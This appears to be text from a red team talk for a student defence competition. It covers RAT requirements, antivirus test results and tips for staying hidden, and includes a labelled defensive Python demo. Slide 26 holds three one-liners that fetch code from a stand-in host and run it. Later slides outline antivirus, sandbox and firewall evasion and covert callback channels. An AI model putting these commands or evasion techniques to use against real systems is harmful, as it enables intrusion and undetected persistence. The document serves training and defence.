23. Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
24. Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIXes
Make Windows look great
No two Linux distros start up the same way
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
26. On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
while [ true ]; do wget -O - http://a.bc/def | sh; sleep 10; done
eval(urllib2.urlopen('http://a.bc/def').read())
echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
27. First world red team problems:
I accidentally six or seven keylogger copies
31. AV test lab
Top market share AVs (Internet Security Suite version) on default settings
7 “fresh” tests (results recorded BEFORE I knew what any of the AVs would detect)
33. Test 1: Widely known malware with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
[Per-product results grid; vendor labels were lost in extraction: 6 FAIL, 6 WIN out of 12 products]
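Test 1's point in code, as an added example that is not part of the original slides: a whole-file SHA-256 blocklist misses the sample as soon as one byte is appended, while a content signature still fires and a piecewise chunk-hash similarity score still shows the file is almost identical to the known one. The sample bytes, marker string and signature name are constructed for the demo.

```python
import hashlib
import re

# Constructed stand-in for a "widely known" sample: a fake header, padding and
# a distinctive marker a signature author would key on. Not a real sample.
KNOWN_SAMPLE = b"\x4d\x5a\x90\x00" + b"\x00" * 16 + b"EVIL_RAT_CALLBACK_v1" + b"\x00" * 8

# Hash-list detection: exact SHA-256 of the whole file.
HASH_BLOCKLIST = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}

# Content signature: a byte pattern matched anywhere in the file (name is made up).
SIGNATURES = {"Constructed.RAT.Marker": re.compile(rb"EVIL_RAT_CALLBACK_v\d")}

CHUNK = 16  # piecewise hashing granularity in bytes


def hash_match(blob: bytes) -> bool:
    """True only if the whole-file hash is on the blocklist."""
    return hashlib.sha256(blob).hexdigest() in HASH_BLOCKLIST


def signature_match(blob: bytes) -> list:
    """Names of the content signatures that fire on the blob."""
    return [name for name, pat in SIGNATURES.items() if pat.search(blob)]


def chunk_hashes(blob: bytes) -> set:
    """SHA-256 of each fixed-size chunk; appending a byte only adds one chunk."""
    return {hashlib.sha256(blob[i:i + CHUNK]).hexdigest() for i in range(0, len(blob), CHUNK)}


def chunk_similarity(a: bytes, b: bytes) -> float:
    """Jaccard overlap of the two chunk-hash sets: 1.0 for identical files, 0.0 for unrelated."""
    ha, hb = chunk_hashes(a), chunk_hashes(b)
    union = ha | hb
    return len(ha & hb) / len(union) if union else 1.0


def scan(blob: bytes) -> dict:
    """Run all three detectors against the known sample and report what each says."""
    return {
        "hash_list": hash_match(blob),
        "signatures": signature_match(blob),
        "similarity_to_known": chunk_similarity(KNOWN_SAMPLE, blob),
    }


if __name__ == "__main__":
    print("original :", scan(KNOWN_SAMPLE))
    print("+1 byte  :", scan(KNOWN_SAMPLE + b"\x00"))  # the Test 1 variant
```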
34. Test 2: Malware with public code samples
[Per-product results grid; vendor labels were lost in extraction: 12 FAIL out of 12 products]
35. Test 3: One-off malware with no evasions
[Per-product results grid; vendor labels were lost in extraction: 7 FAIL, 3 WIN, 2 INDECISIVE out of 12 products]
37. Test 5: “The Kraken” – Sneaky firewall-evading malware
[Per-product results grid; vendor labels were lost in extraction: 11 FAIL, 1 WIN out of 12 products]
38. Test 6: Worm with no evasions
[Per-product results grid; vendor labels were lost in extraction: 9 FAIL, 2 WIN, and one product hosed the VM, out of 12 products]
39. Test 7: Legit program used maliciously
[Per-product results grid; vendor labels were lost in extraction: 11 FAIL, 1 INDECISIVE out of 12 products]
40. Notes
Symantec was the only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on the whitelist), but not necessarily as bad
Trend Micro was the only AV to block hash dumping
Panda and Avast gave errors installing and were not tested
42. Just kidding. After 2 hours of obfuscating, these are the real final standings:
[Per-product results grid; vendor labels were lost in extraction: 12 FAIL out of 12 products]
43. How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
44. Security Software Lessons
Some AVs are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
46. Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
49. Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using HTTP(S) instead of TCP callbacks doesn’t leave a connection open
If that fails, blend in by using common ports and cloud IPs
Migrate session to web browser or critical process
50. Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
51. Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
52. Network firewalls
Great to own
Tough if you don’t
Use service ports, since they must be able to reach the hosts
53. Defenses that hurt
Patch or block RCEs
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you